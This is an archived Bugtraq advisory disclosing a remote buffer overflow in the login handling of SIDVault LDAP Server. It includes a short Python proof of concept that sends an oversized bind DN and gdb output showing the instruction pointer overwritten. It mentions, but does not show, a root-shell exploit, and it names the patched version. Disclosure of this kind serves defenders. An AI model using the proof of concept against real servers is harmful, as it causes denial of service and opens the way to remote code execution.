|Main Archive Page > Month Archives > bugtraq archives|
SIDVault LDAP Server Remote Buffer Overflow
SIDVault LDAP Server for Win32 and GNU/Linux
SIDVault is a Simple Integration Database, allowing easy management and installations with high performance LDAP v3 server. It supports any number of schemas, easy to add/modify existing schemas, integrated web based user access, and fast browser based administration tools. Supports all relevant RFC protocols LDAP v2, LDAP v3, HTTP, ILS.
Vulnerable versions: Win32 2.0e Linux 2.0d
The login mechanism is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer.
Successfully exploiting the issue will allow an attacker to execute arbitrary code with root or SYSTEM-level privileges depending on the operative system target. Failed exploit attempts will result in a denial-of-service condition.
Proof of concept:
# gdb /usr/local/sidvault/sidvault
(gdb) r -run
In another terminal:
$ cat poc.py
l = ldap.open("localhost")
l.simple_bind("dc=" + "A"*4099, "B"*256) $ ./poc.py
In the first terminal:
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1226736720 (LWP 5942)]
0x41414141 in ?? ()
#0 0x41414141 in ?? ()
#1 0x41414141 in ?? ()
(gdb) i r
eax 0x8202c48 136326216 ecx 0x0 0 edx 0xb6e164df -1226742561 ebx 0x41414141 1094795585 esp 0xb6e16500 0xb6e16500 ebp 0x41414141 0x41414141 esi 0x41414141 1094795585 edi 0x41414141 1094795585 eip 0x41414141 0x41414141
An exploit for Debian based distributions which spawns a remote root terminal has been writen. See the attached exploit.
The problem is solved in the latest version (2.0f) which is available in the vendor's website at http://www.alphacentauri.co.nz/.
Thanks to Lynden Sherriff from Alphacentauri Ltd., he where very kind and professional.
The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind.
I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.
Joxean Koret - joxeankoret[at]yahoo[dot]es